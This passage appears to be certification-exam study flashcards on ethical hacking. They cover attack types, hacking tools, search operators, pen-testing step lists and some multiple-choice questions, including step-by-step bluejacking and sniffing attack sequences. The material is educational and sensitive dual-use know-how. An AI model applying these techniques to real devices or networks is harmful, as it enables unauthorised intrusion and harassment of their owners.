It refers to technologies that use dynamic web pages, thus superseding the Web 1.0 technology, which used static HTML web pages -Latest generation of web apps facilities Interoperability o Blogs (Wordpress) o Advanced gaming o Dynamic as opposed to static site content o RSS-generated syndication User-centered Design o Social networking sites (Facebook, Twitter, LinkedIn, etc.) o Mash-ups (Emails, IMs, Electronic payment systems) o Wikis and other collaborative applications o Google Base and other free Web services (Google Maps) Collaboration on the Web o Cloud computing websites like (amazon.com) o Interactive encyclopedias and dictionaries o Online office software (Google Docs and Microsoft Silverlight) o Ease of data creation, modification, or deletion by individual users Interactive Data Sharing o New technologies like AJAX (Gmail, YouTube) o Mobile application (iPhone) o Flash rich interface websites o Frameworks (Yahoo! UI Library, jQuery)
IoT OS : Apache Mynewt
It supports devices that work on Bluetooth Low Energy protocol.
Finish alias "FIN":
Its flag is set to "1" to announce that it will not send more transmissions to the remote system and terminates the connection established by the SYN flag.
inanchor:
This operator restricts results to only those pages containing the query terms specified in the anchor text on links to the page. [Anti-virus inanchor:Norton] query returns only pages with anchor text on links to the pages containing the word "Norton" and the page containing the word "Anti-virus."
intitle:
This operator restricts results to only those pages containing the specified term in the title. [malware detection intitle:help] query returns only pages that have the term "help" in the title, and "malware" and "detection" terms anywhere within the page.
Interacting with File System
LOAD_FILE() -MySQL is used to read and return the contents of a file located within the MySQL server OUTFILE() -n MySQL is often used to run a query, and dump the results into a file.
what is Oputils?
SNMP enumeration service A switch port and IP address management software. -It contains a collection of tools that network engineers can use to monitor, diagnose, and troubleshoot networking issues. -can manage IP address, map switch ports, detect rogue devices, monitor bandwidth usage, monitor DHCP server, backup Cisco config files, view SNMP traps sent from network devices, get MAC IP list, troubleshoot the network, etc.
Nbstat -s
Lists the NetBIOS sessions table converting destination IP addresses to computer NetBIOS names
nbstat -S
Lists the current NetBIOS sessions and their status with the IP addresses
Mobile Protection Tools
Lookout Personal - helps to protect your device from security threats, loss, and theft, available for Android and iPhone devices. It provides mobile security, identity protection, and theft prevention in a single app Zimperium's zIPS - is the mobile intrusion prevention system app that provides comprehensive protection for iOS and Android devices against mobile network, device and application cyber attacks BullGuard Mobile Security - is an app for Android devices that provides total protection for mobile devices and personal data. It delivers complete mobile phone antivirus against all mobile phone viruses
Trojan
Malicious or harmful code that is contained apparently harmless programming or data in such a way that it can get control and cause damage as ruining file allocation table on your hard disk. works on the same level of privileges as victims Activates upon user's certain predefined actions and upon activation, it can grant attacker unrestricted access to all data stored to all data stored on compromised info system and can cause potentially immense damage. It creates a covert communication channel between the victim computer and the attacker for transferring sensitive data.
Computer Worms
Malicious programs that replicate, execute, and spread across the network connections independently, consuming available computing resources without human interaction
Dynamic Malware Analysis -DNS Monitoring/ Resolution
Malicious software called DNSChanger is capable of changing the system's DNS server settings and provides the attackers with control of the DNS server used on the victim's system Use this to verify the DNS servers that the malware tries to connect to and identify the type of connection Tool - DNSQuerySniffer
Footprinting Tools: Maltego & Recon-ng
Maltego -shows relationships & real world links Recon-ng - Web Reconnaissance framework with independent modules, database interaction, built in convenience functions, interactive help, and command completion, that provides an environment in which open source web-based reconnaissance can be conducted
Dynamic Malware Analysis - Startup Programs Monitoring
Malware can alter the system settings and add themselves to the startup menu to perform malicious activities whenever the system starts Manually check or use startup monitor tools like Autoruns for Windows and WinPatrol to detect suspicious startup programs and processes
Dynamic Malware Analysis - Network Traffic Monitoring /Analysis
Malware connect back to their handlers and send confidential info to attackers Use this to monitor network traffic going to malicious remote addresses Tool - Capsa Network Analyzer - to monitor network traffic and look for suspicious malware activities
Session Hijacking Detection Methods
Manual Normal telnet session Forcing an ARP Entry Automatic
How Distributed Denial-of-Service Attacks Work?
Many applications pound the target browser or network with fake exterior requests that make the system, network, browser, or site slow, useless, and disabled or unavailable. The attacker initiates the DDoS attack by sending a command to the zombie agents. These zombie agents send a connection request to a large number of reflector systems with the spoofed IP address of the victim. The reflector systems see these requests as coming from the victim's machine instead of the zombie agents due to spoofing of source IP address. they send the requested information (response to connection request) to the victim. The victim's machine is flooded with unsolicited responses from several reflector computers at once. This either may reduce the performance or may cause the victim's machine to shut down completely.
Exploit HVAC
Many organizations use internet connected heating, ventilation, and air conditioning systems without implementing security mechanisms, giving attackers a gateway to hack corporate systems HVAC systems have many security vulnerabilities that are exploited by attackers to steal login credentials, gain access to HVAC system and perform further attack on the organization's network use shoden to do this attack
OWASP A3: Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII (Personal Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. Weak encryption code
Packet Crafting tools
NetscanTools Pro Ostinato Wan Killer Packeth LANforge Fire Bit-Twist WireEdit
ICMP Flood Attack
Network administrators use this primarily for IP operations, troubleshooting, and error messaging of undeliverable packets Attackers send large volumes of ICMP echo request packets to a victim's system directly or through reflection networks. These packets signal the victim's system to reply, and the combination of traffic saturates the bandwidth of the victim's network connection causing it to be overwhelmed and subsequently stop responding to the legitimate TCP/IP requests. To protect against this attack, set a threshold limit that when it exceeds, it invokes the ICMP flood attack protection feature. When the ICMP threshold exceeds (by default the threshold value is 1000 packets/second), the router rejects further ICMP echo requests from all addresses in the same security zone for the remainder of the current second and the next second as well.
Snort IDS (also Sniffer, Logger & IPS)
Network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis and content searching/matching and is used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts. Uses of Snort: o Straight packet sniffer like tcpdump o Packet logger (useful for network traffic debugging, etc.) o Network intrusion prevention system Snort Rules -uses the popular libpcap library (for UNIX/Linux) or Winpcap (for Windows), the same library that tcpdump uses to perform its packet sniffing.
MiTM Attack Using Forged ICMP and ARP Spoofing
Network-Level Session Hijacking Destination unavailable or high latency messages, are sent to fool the victim The hacker's packets send error messages indicating problems in processing packets through the original connection. This fools the server and client into routing through hijacker's path instead The attacker sends forged ARP replies that update the ARP tables of the host that is broadcasting ARP requests. This delivers the traffic to the host instead of delivering it to the legitimate IP.
Access Control Attacks
These attacks aim to penetrate a network by evading wireless LAN access control measures, such as AP MAC filters and Wi-Fi port access controls Types o War Driving o Rogue Access Point o MAC Spoofing o AP Misconfiguration o Ad Hoc Association o Promiscuous Client o Client Mis-Association o Unauthorized Association
Operating System Flaws
These attacks are performed by using malicious code, script or unwanted software, which result in loss of sensitive information and loss of control on computer operations. Timely patching of OS, installing minimum software applications and use of applications with firewall capabilities are essential steps that an administrator needs take to protect OS from any attack.
what is an OID in SNMP?
Object ID -is the numeric name given to the object and begins with the root of the MIB tree. -can uniquely identify the object present in the MIB hierarchy
Common Vuln Scoring System (CVSS)
Open framework for communicating the characteristics & impacts of IT vulnerabilities well suited as a standard measurement system for industries, organizations, and governments that need accurate and consistent vulnerability impact scores. uses are prioritization of vulnerability remediation activities and in calculating the severity of vulnerabilities discovered on one's systems. provides a way to capture the principal characteristics of a vulnerability, and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.
Open Services
Open ports and services may lead to loss of data, DoS attacks and allow attackers to perform further attacks on other connected devices. Administrators need to continuously check for unnecessary or insecure ports and services to reduce the risk on the network.
Confidentiality Attacks
These attacks attempt to intercept confidential information sent over a wireless network, regardless of whether the system transmits data in clear text or encrypted format. Types o Eavesdropping o Traffic Analysis o Cracking WEP Key - Aircrack, AirSnort, chopchop, WepAttack, WepDecrypt o Evil Twin AP o Honeypot AP o Session Hijacking o Masquerading -Pretending to be an authorized user to gain access to a system o MITM Attack
Communication Paths
Overt channel - refers to something that is explicit, obvious, or evident. It is a legal channel for the transfer of data or information in a company network and works securely to transfer data and information. Covert Channels - refers to something that is select, concealed or hidden. It is an illegal, hidden path used to transfer data from a network.
Password Guessing
Password guessing is one of the password cracking techniques that involves attempting to log on to the target system with different passwords manually. Find a valid user Create list of possible passwords Rank passwords by probability Enter each pwd manually -can use a for loop to automate -The failure rate of this type of attack is high.
Defend Against MAC Attacks
Port security - assign a secure MAC address to a secure port allow the port to dynamically configure secure MAC -You can configure all secure MAC addresses by using the switch port, port-securing mac-address interface configuration command. -You can allow the port to dynamically configure secure MAC addresses with the MAC addresses of the connected devices. -You can configure a number of addresses and allow the rest to be dynamically configured. Traps - Port security limits MAC flooding attacks and locks down ports, sending an SNMP trap.
Promiscuous detection tool
PromqryUI and nmap
Post-Assessment Phase
Risk assessment Remediation Verification Monitoring pg 145
Post-Assessment Phase
Risk assessment - Risk Assessment In this phase, all the serious uncertainties that are associated with the system are assessed, fixed, and permanently eliminated for ensuring a flaw free system. -summarizes the vulnerability and risk level identified for each of the selected asset. -determines the risk level for a particular asset, whether it is high, moderate or low. Remediation - the process of reducing the severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps. Verification - This phase provides a clear visibility into the firm and allows the security team to check whether all the previous phases are perfectly employed or not. -can be performed by using various means such as ticking systems, scanners, reports Monitoring -Regular monitoring needs to be performed for maintaining the system security using tools such as IDS/IPS, firewalls, etc. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved.
Look for the nop opcode other than 0x90
Riya wants to defend against the polymorphic shellcode problem. What countermeasure should she take against this IDS evasion technique? -Disable all FTP connections to or from the network -Configure a remote syslog server and apply strict measures to protect it from malicious users. -Look for the nop opcode other than 0x90 -Catalog and review all inbound and outbound traffic
site:
This operator restricts search results to the specified site or domain. [games site: www.certifiedhacker.com] query gives information on games from the certifiedhacker site.
The System Point of Attack : Android Rooting:
Rooting allows Android users to attain privileged control (known as "root access") within Android's subsystem. Like jailbreaking, rooting can result in the exposure of sensitive data stored in the mobile device. Allows Android users to attain privileged control within Android's subsystem Rooting process involves exploiting security vulnerabilities in the device's firmware, and copying the su binary to a location in the current process's PATH (e.g., /system/xbin/su) and granting it executable permissions with the chmod command
TCP/UDP 445
SMB over TCP (Direct Host) -Windows supports file and printer sharing traffic using the Server Message Block (SMB) protocol directly hosted on TCP
TCP 25
SMTP (Simple Mail Transfer Protocol) -SMTP is a TCP/IP mail delivery protocol. -It runs on the connection-oriented service provided by Transmission Control Protocol (TCP)
Acunetix Web Vulnerability Scanner
SQL injection detection tool Vulnerability Scanner provides automated web application security testing with innovative technologies including: DeepScan and AcuSensor Technology. Features : o Crawl and scan HTML5 web applications, and execute JavaScript like a real browser o Detects advanced DOM-based Cross-site Scripting o Provides a stack-trace of the injected DOM-based XSS payload o Checks for blind XSS and XML External Entity Injection (XXE) o Checks for Server-Side Request Forgery (SSRF) and Host Header Attacks o Checks Email Header Injection and Password Reset Poisoning
How to BlueJack a Victim
STEP 1 o Select an area with plenty of mobile users, like a café, shopping center, etc. o Go to contacts in your address book (You can delete this contact entry later). STEP 2 o Create a new contact on your phone address book. o Enter the message into the name field. Ex: "Would you like to go on a date with me?" STEP 3 o Save the new contact with the name text and without the telephone number. o Choose "send via Bluetooth". These searches for any Bluetooth device within range. STEP 4 o Choose one phone from the list discovered by Bluetooth and send the contact. o You will get the message "card sent" and then listen for the SMS message tone of your victim's phone.
Malware Penetration Testing
Scan the system for suspicious open ports using tools such as TCPView and netstat Scan the system for suspicious running processes using tools such as Process Monitor and Process Explorer Scan the system for suspicious registry entries using tools such as jv16 Power Tools 2017 and Reg Organizer Scan the system for suspicious running services using tools such as SrvMan and Advance Windows Service Manager If any suspicious port, process, registry entry, or service is discovered, check the associated executable files Collect more information about these from publisher's websites, if available, and the Internet Check if the open ports are known to be opened by malware in the wild Check the startup programs using tools such as Autoruns for Windows and WinPatrol and determine if all the programs in the list can be recognized with known functionalities Check the system logs, security logs and application logs for any malicious or unusual activity using tools like Loggly and SolarWinds Log & Event Manager (LEM) Scan the system using tools such as Mirekusoft Install Monitor and SysAnalyzer for detecting suspicious programs that are installed without users consent Check the data files for modification or manipulation by opening several files and comparing hash value of these files with a pre-computed hash using tools like SIGVERIF and Tripwire Scan for suspicious device drivers using tools such as DriverView and Driver Reviver ] Check for suspicious network activities such as upload of bulk files or unusually high traffic going to a particular web address using tools such as Capsa Network Analyzer and Wireshark Scan the system for suspicious modifications in DNS Server settings using tools such as DNSQuerySniffer and DNSstuff Scan the system for suspicious API application calls using tools such as API Monitor and APImetrics Run an updated anti-malware scanner from a reputed vendor to identify malware in wild Document all your findings: It helps in determining the next action if malware is identified in the system.
ping sweeps, ICMP scans
Scanning Methodology: How to check for live systems
Qualys Free Scan
Scans network, servers, dekstops & web apps Features: Scans computers and apps on the Internet or in the network Detects security vulnerabilities and the patches needed to fix them Enables viewing of interactive scan reports by threat or by patch Tests websites and apps for OWASP Top Risks and malware Tests computers against SCAP security benchmarks
Vulnerability Assessment: Inference-Based
Scans ports & services to determine relevant tests pg 147
Egress Filtering
Scans the headers of IP packets leaving a network. If the packets pass the specifications, they can route out of the sub-network from which they originated. - It ensures that unauthorized or malicious traffic never leaves the internal network.
Android Vulnerability Scanner: X-Ray
Scans your Android device to determine whether there are vulnerabilities that remain unpatched by your carrier. It presents you with a list of vulnerabilities that it is able to identify and allows you to check for the presence of each vulnerability on your device X-Ray is automatically updated with the ability to scan for new vulnerabilities as they are discovered and disclosed
GFI LanGuard
Scans, detects, assesses and rectifies vulnerabilities
Network Discovery and Mapping Tools for Mobile
Scany, -a network scanner app for iPhone and iPad, scans LAN, Wi-Fi networks, websites, open ports, discovers network devices, and digs network info. -It supports a number of networking protocols and anti-stealth technologies Network "Swiss-Army-Knife" - a network application for iPhone to perform a number of tasks mentioned below -PortDroid Network Analysis - NetX - Network Discovery - Network Mapper - Fing - Network Tools - ezNetScan
Two Types of Ethernet environments
Shared Ethernet -In a shared Ethernet environment, a single bus connects all the hosts that compete for bandwidth. -In this environment, all the other machines receive packets meant for one machine. -Sniffing in a shared Ethernet environment is passive and hence difficult to detect Switched Ethernet -In a switched Ethernet environment, the hosts connect with a switch instead of a hub. -The switch maintains a table that tracks each computer's MAC address and the physical port on which that MAC address is connected, and then delivers packets destined for a particular machine -Though the switch is more secure than a hub, sniffing the network is possible using ARP spoofing and Mac Flooding,
Wireshark
Sniffing tool. Uses Winpcap to capture live traffic on supported networks. Available filters to customize data display. Displays data from the TCP port with a feature known as "Follow TCP stream." -The tool sees TCP data in the same way as that of the application layer. -Use this tool to find passwords in a Telnet session or make sense of a data stream
Web Service Attack Tools
SoapUI Pro -a web service testing tool which supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. Attacker can use this tool to carry out web services probing, SOAP injection, XML injection, and web services parsing attacks Altova XMLSpy -is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.
Footprinting: People Search Tools
Social media, pipl - is an online people search tool to find other users through their name, email, username or phone number Intelius BeenVerified Spokeo AnyWho US Search 411 Veromi PrivateEye Public Background Checks Zaba Search WebMii InSpy - is a python based LinkedIn enumeration tool. It performs enumeration on LinkedIn and finds people based on job title, company, or email address. InSpy has two functionalities: o TechSpy: Crawls LinkedIn job listings for technologies used by the provided company. o EmpSpy: Crawls LinkedIn for employees working at the provided company
LDAP Enumeration Tools
Softerra LDAP Administrator - It browses and manages LDAP directories. Additionally, it provides a wide variety of features essential for LDAP development, deployment, and administration of directories. LDAP Admin Tool LDAP Account Manager LDAP Search JXplorer Active Directory Explorer LDAP Admin LDAP Administration Tool OpenLDAP ad-ldap-enum LEX - The LDAP Explorer LDAP Browser/Editor
Desktop Spyware
Software that allows an attacker to gain information about a user's activity or gather personal information about the user and send it via the Internet to third parties without the user's knowledge or consent. It provides information regarding what network users did on their desktops, how, and when. Desktop spyware allows attackers to perform the following: • Live recording of remote desktops • Recording and monitoring Internet activities • Recording software usage and timings • Recording activity log and storing at one centralized location • Logging users' keystrokes
inurl:
This operator restricts the results to only those pages containing the word specified in the URL. [inurl: copy site:www.google.com] query returns only pages in Google site in which the URL has the word "copy."
Application-based Point of Attack : Sensitive Data Storage
Some apps installed and used by mobile users employ weak security in their database architecture, which make them targets for attackers to hack and steal sensitive user information stored in them
Reasons for attack
Some attacks are not made to attain financial gains, but for personal reasons: - For the sake of pure curiosity - For the sake of achieving a self-set intellectual challenge - To damage the target organization's reputation
DNS SOA Record
Start of Authority: -Id's primary name server for the zone -Indicates authority for domain
Ways to obtain a valid session IDs
Stealing Guessing Brute forcing
Web Application Pen testing
Step 1: Define objective You should define the aim of the penetration test before conducting it. This would help you to move in right direction towards your aim of penetration test. Step 2: Information gathering You should gather as much information as possible about your target system or network. Step 3: Configuration management testing Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you to protect against known vulnerabilities by installing the latest updates. Step 4: Authentication testing Test the authentication mechanism of the application by trying to bypass authentication mechanism anyway and to determine the possible exploits in it. Step 5: Session management testing Perform session management testing to check your web application against various attacks that attacker carries out on session ID such as session hijacking, session fixation, and so on. Step 6: Denial-of-service testing Send a vast amount of requests to the web application until the server is saturated. Analyze the behavior of application when the server is saturated. In this way, you can test your web application against denial-of-service attacks. Step 7: Data validation testing Failing to adopt a proper data validation method is a common security weakness observed in most web applications, which can further lead to major vulnerabilities. Thus, before a hacker finds those vulnerabilities and exploits your application, you must perform data validation testing and protect it. Step 8: Business logic testing Web application security flaws may be present even in the context of business logic, such as improper error handling. Try to exploit such flaws. Attackers may do something that a business does not allow, which could in turn lead to great financial losses. Testing business logic for security flaws often requires unconventional thinking. Step 9: Authorization testing Analyze how a web application authorizes users, then try to find and exploit the vulnerabilities present in the authorization mechanism. For example, once authenticated by the application, you should try to escalate your privileges to access sensitive areas such as an admin page. Step 10: Web services testing Web services use HTTP protocol in conjunction with SML, WSDL, SOAP, and UDDI technologies. Therefore, they have XML parser-related vulnerabilities in addition to SQL injection, information disclosure, and so on. You should conduct web services testing to determine their vulnerabilities. Step 11: AJAX testing Though developers develop more responsive web applications using AJAX, it is likely that they are just as vulnerable as traditional web applications. Testing for AJAX is challenging, because developers are given full freedom to design the method of client-server communication. Step 12: Document all the findings Once you conduct all the tests mentioned above, document all your findings and the testing techniques you employed at each step. Analyze the document, explain the current security posture to the concerned parties, and suggest how they can enhance their security.
Sniffing Pen Testing
Step 1: Perform MAC Flooding Attack Step 2: Perform DHCP Starvation Attack Step 3: Perform Rogue Server Attack Step 4: Perform ARP Poisoning Step 5: Perform MAC Spoofing ing, and/or MITM attacks. Step 7: Perform DNS Spoofing Step 8: Perform Cache Poisoning Step 9: Perform Proxy Server DNS Poisoning Step 10: Document all the Findings
Scanning Pen Testing
Step 1: Perform host discovery Step 2: Perform port scanning Step 3: Scan beyond IDS and firewall Step 4: Perform banner grabbing or OS fingerprinting Step 5: Draw network diagrams Step 6: Document all the findings
Sublist3r
a python script designed to enumerate subdomains of websites using OSINT. [-d DOMAIN] [-b BRUTEFORCE] [-p PORTS] [-v VERBOSE] [-t THREADS] [-e ENGINES] [-o OUTPUT] [-h HELP] -shows help messages
UrlScan
This is a security tool that restricts the types of HTTP requests that Microsoft IIS will process. By blocking specific HTTP requests, this security tool helps prevent potentially harmful requests from reaching the server. It is implemented as an ISAPI filter that screens and analyzes HTTP requests as IIS receives them. When properly configured, it is effective at reducing the exposure of IIS to potential Internet attacks. Administrators may configure it to reject HTTP requests
MAC Spoofing Tools
Technitium MAC Address (TMAC) -allows you to change (spoof) Media Access Control (MAC) Address of your Network Interface Card (NIC) instantly Change Mac Address, MAC adddress changer, GhostMac SMAC, SpoofMAC Win7 MAC
SeaCat.io
This is a security-first SaaS technology to operate IoT products in a reliable, scalable and secure manner. It provides protection to end users, business, and data.
Censys
a search engine that enables researchers to ask questions about the hosts and networks that compose the Internet. Censys collects data on hosts and websites through daily ZMap and ZGrab scans of the IPv4 address space, in turn maintaining a database
Steganography (stego)
The art of hiding data "behind" other data without the target's knowledge. Thus, hides the existence of the message. It replaces bits of unused data into the usual files such as graphic, sound, text, audio, video, etc. with some other surreptitious bits.
What is Active Session Hijacking?
The attacker takes over an existing session either by tearing down the connection on one side of the conversation or by actively participating. An example is a man-in-the-middle (MITM) attack. To make this attack to successful, the attacker must guess the sequence number before the target responds to the server. On most current networks, sequence number prediction does not work because operating-system vendors use random values for the initial sequence number, which makes it harder to predict sequential numbers
Multi-Vector Attack
The attackers use combinations of volumetric, protocol, and application-layer attacks to take down the target system or service Attacker quickly changes from one form of DDoS attack (e.g., SYN packets) to another one (Layer 7), These attacks are either launched one vector at a time, or in parallel, in order to confuse a company's IT department and make them spend all their resources as well as divert their focus to the wrong side
Competitive Intelligence
The information gathered by a business entity about its competitors' customers, products, and marketing How it began -EDGAR Database How it developed -hoovers -BusinessWire Company plans? -MarketWatch -Wall Street Transcript, -FACTIVA- journal reviews -LexisNexis - Legal info
Investigate based on the potential effect of the incident.
The intrusion detection system at a software development company suddenly started generating multiple alerts regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What should the security team do to determine which alerts to check first? -Investigate based on the maintenance schedule of the affected systems. -Investigate based on the service-level agreements of the systems. -Investigate based on the order that the alerts arrived in. -Investigate based on the potential effect of the incident.
Spoofing vs Hijacking
The major difference between spoofing and Hijacking is an active session. In a spoofing attack, the attacker pretends to be another user by impersonating to gain access. The attacker does not have any active session; it initiates a new session with the target by the help of stolen information. Hijacking is the process of taking control over an existing active session between an authenticated user and a targeted host. Session Hijacking in
Petya -NotPetya
The master boot record is infected to execute a payload that encrypts a hard drive's file system table and stops Windows from booting. It can spread over the network using WMIC (Windows Management Instrumentation Command-line) by capturing credentials from the local machine using Mimikatz. It encrypts computer files and demands a ransom of $300 Bitcoins to decrypt the data.
System or Boot Sector Viruses
The most common targets for a virus are the these, which include the master boot record (MBR) and the DOS boot record system sectors MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during the system booting. This is the crucial point of attack for viruses. This virus moves MBR (Master Boot Record) to another location on the hard disk and copies itself to the original location of the MBR When the system boots, the virus code is executed first and then control is passed to original MBR Virus Removal -One way to deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac because Windows is more prone to these attacks. -The other way is to carry out antivirus checks on a periodic basis
Attack Access Control
The part of application's security mechanisms which logically built on authentication and session management. o Parameter-Based Access Control: -Any web application consists of various request parameters like cookies, query string parameters, etc. The application decides the access grant to a request based on these parameters o Referer-Based Access Control: -In some web-applications, HTTP referrer is the foundation to make major access control decisions. -As Http referrer is considered unsafe, attacker uses HTTP referrer and manipulates it to any value o Location-Based Access Control: -The users geographic location can be determined by various methods. The most common method to determine current location is through IP address. -Attackers can bypass location based access controls by using a web-proxy's, a VPN, a data roaming enabled mobile device, direct manipulation of mechanisms, etc
DoS Fragmentation
These attacks destroy a victim's ability to reassemble the fragmented packets by flooding it with TCP or UDP fragments, resulting in reduced performance. The attacker sends large number of fragmented (1500+ byte) packets to a target web server with relatively small packet rate. Since the protocol allows fragmentation, these packets usually pass through the network equipments uninspected such as routers, firewalls, and Intrusion Detection System (IDS)/Intrusion Prevention System (IPS). Reassembling and inspecting these large fragmented packets consumes excessive resources. Fragments will be randomized by the attacker, which makes the process to consume more resource in turn leading the system to crash.
Volumetric Attacks
These attacks exhaust the bandwidth either within the target network/service, or between the target network/service and the rest of the Internet, and result in traffic blockage preventing access to legitimate users. The magnitude of attack is measured in bits per second (bps). - slow down performance and degradation of the network generally target protocols that are stateless and do not have built-in congestion avoidance. This has two types of bandwidth depletion flood attacks and amplification attacks.
Scanning
The procedure for identifying active hosts, open ports, and unnecessary services enabled on particular hosts. Attackers use different types of scanning, such as port scanning, network scanning, and vulnerability scanning of target networks or systems, which help in identifying possible vulnerabilities. Scanning procedures such as port scanning and ping sweep return information about the services offered by the live hosts that are active on the Internet, and their IP addresses.
Footprinting
The process of accumulating data regarding a specific network environment. In the this phase, the attacker creates a profile of the target organization, obtaining information such as its IP address range, namespace, and employees. This eases the process of system hacking by revealing its vulnerabilities. For example, the organization's website may provide employee bios or a personnel directory, which the hacker can use it for social engineering purposes. Conducting a Whois query on the web can provide information about the associated networks and domain names related to a specific organization.
Encoding Schemes
The process of converting source information into its equivalent symbolic form, which helps in hiding the meaning of data. Types o URL Encoding - "%" followed by the character's two-digit ASCII code expressed in hexadecimal such as: - %3d ( = ) -%0a ( New line ) - %20 ( space ) o HTML Encoding - used to represent unusual characters so that they can be safely combined within an HTML document. -& ( & ) -< ( < ) -> ( > ) o Unicode encoding - is of two types: 16 bit Unicode Encoding and UTF-8. -16 bit Unicode Encoding - It replaces unusual Unicode characters with "%u" followed by the character's Unicode codepoint expressed in hexadecimal. -UTF-8 - It is a variable-length encoding standard which uses each byte expressed in hexadecimal and preceded by the % prefix. Base64 encoding scheme - represents any binary data using only printable ASCII characters. Usually it is used for encoding email attachments for safe transmission over SMTP and also used for encoding user credentials. Hex Encoding - HTML encoding scheme uses hex value of every character to represent a collection of characters for transmitting binary data.
How to Defend Against Command Injection Flaws
The simplest way to protect against it s is to avoid them wherever possible. o Perform input validation o Escape dangerous characters o Use language-specific libraries that avoid problems due to shell commands o Perform input and output encoding o Use a safe API which avoids the use of the interpreter entirely o Structure requests so that all supplied parameters are treated as data, rather than potentially executable content o Use parameterized SQL queries o Use modular shell disassociation from kernel
Finding Exploitable Vulnerabilities
The software designing flaws and programming errors lead to security vulnerabilities. An attacker takes advantage of these vulnerabilities to perform various attacks on confidentiality, availability, or integrity of a system. Attackers exploit these software vulnerabilities such as programming flaws in a program, service, or within the OS software or kernel to execute malicious code
Cryptanalysis
The study of ciphers, cipher text, or cryptosystems with the ability to identify vulnerabilities in them that allows to extract plaintext from the ciphertext even if the cryptographic key or algorithm used to encrypt the plaintext is unknown
An attacker, working slowly enough, can evade detection by the IDS.
The use of alert thresholding in an IDS can reduce the volume of repeated alerts, but introduces which of the following vulnerabilities? -Network packets are dropped if the volume exceeds the threshold. -Thresholding interferes with the IDS' ability to reassemble fragmented packets. -An attacker, working slowly enough, can evade detection by the IDS. -The IDS will not distinguish among packets originating from different sources.
In-Band SQL Injection
These are error-based SQL injection and UNION SQL injection uses the same communication channel to perform the attack and retrieve the results These are commonly used and easy-to-exploit SQL injection attacks
Components of IoT : IoT Gateways
These are used to bridge the gap between the IoT device (internal network) and the end user (external network) and thus allowing them to connect and communicate with each other. The data collected by the sensors in IoT devices send the collected data to the concerned user or cloud through this
Client-side attacks used to compromise Session IDs
These attacks occur when clients establish connections with malicious servers, as clients happen to process potentially harmful data from them. Cross-Site Scripting (XSS): -XSS enables attackers to inject malicious client side scripts into the web pages viewed by other users. Malicious JavaScript Codes: - A malicious script can be embedded in a web page that does not generate any warning but it captures session tokens in the background and send it to the attacker. Trojans: -A Trojan horse can change the proxy settings in user's browser to send all the sessions through the attackers machine. CRIME (Compression Ratio Info-Leak Made Easy) attack exploits the vulnerabilities present in data compression feature of protocols such as SSL/TLS, SPDY, and HTTPS. Cross-Site Request Forgery an attacker forces the victim to submit the attacker's form data to the victim's Web server.
Short-range communication : QR Codes and Barcodes
These codes are machine readable tags that contains information about the product or item to which they are attached. Quick Response code or QR code is a two-dimensional code that stores product's information and it can be scanned using smart phones whereas Barcode comes in both, one dimensional (1D) and two-dimensional (2D) code.
Compensating/Corrective Control
These controls are used as an alternative control when the intended controls fail or cannot be used. They do not prevent any attack attempt but try to restore using other means like restoring from backup. Examples include hot site, backup power system, et These controls minimize the consequences of an incident, probably by limiting the damage
Recovery Control
These controls are used in a more serious condition to recover from security violation and restore information and systems to a persistent state. Examples include disaster recovery, business continuity plans, backup systems, etc
Detective Control
These controls detect security violations, and record any intrusion attempts. These controls act when preventive controls fail. Examples include motion detector, alarm systems and sensors, video surveillance, etc.
Preventive Control
These controls prevent security violations and enforce various access control mechanisms. Preventive controls may be physical, administrative, or technical. Examples include door lock, security guard, etc. These controls strengthen the system against incidents, probably by minimizing or eliminating vulnerabilities
OWASP A8: Insecure Deserialization
These flaws occur when an application receives hostile serialized objects. -leads to remote code execution. Attackers inject malicious code into serialized linear formatted data and forward the malicious serialized data to the victim. Due to insecure deserialization, the injected malicious code will be undetected and will be present in the final execution of deserialization code. Data serialization (graphic -> code) and deserialization (code -> graphic) is an effective process of linearizing and de-linearizing data objects in order to transport it to other networks or systems Deserialization is the reverse process of serialization, where the recreation of the object data from the linear serialized data format takes place.
Research Honeypot
These honeypots are high interaction honeypots primarily deployed in research institutes, government or military organizations to get a detailed knowledge about the actions of intruders. By using this type of honeypots security analysts can obtain in-depth information about the way an attack is performed, vulnerabilities exploited and the attack techniques and methods used by the attackers. The drawback of this honeypots is that it does not contribute to the direct security of the company, not good for improving infrastructure
HIgh interaction honeypot
These honeypots do not emulate anything; they run actual vulnerable services or software on production systems with real OSs and applications. These honeypots simulate all services and applications. It can be completely compromised They capture complete information about an attack vector such as attack techniques, tools, and intent of the attack. The honeypotized system is more prone to infection, as attack attempts can be carried out on real production systems.
Hardware Keyloggers
These keyloggers are plugged in-line, between a computer keyboard and a computer The main advantage of this Keylogger is that it is not operating system dependent and hence, it will not interfere with any applications running on the target computer, and it is impossible to discover by using any anti-keylogger software. Hardware keystroke loggers are of three main types: - PC/BIOS Embedded -It requires Physical and/or admin-level access to the target computer. - Keylogger Keyboard -By attaching the hardware circuit with the keyboard cable connector, it captures the key strokes. - External Keylogger -attached between a usual PC keyboard and a computer. There are four types of external keyloggers: >• PS/2 and USB Keylogger: Completely transparent to computer operation and requires no software or drivers for the functionality. >• Acoustic/CAM Keylogger: Acoustic keyloggers work on the principle of converting electromagnetic sound waves into data. It makes use of either a capturing receiver capable of converting the electromagnetic sounds into the keystroke data or a CAM (camera) capable of recording screenshots of the keyboard. >• Bluetooth Keylogger: Requires physical access to the target computer only once, at the time of installation. >• Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, it features remote access over the Internet. This wireless keylogger will connect to a local Wi-Fi Access Point, and send E-mails 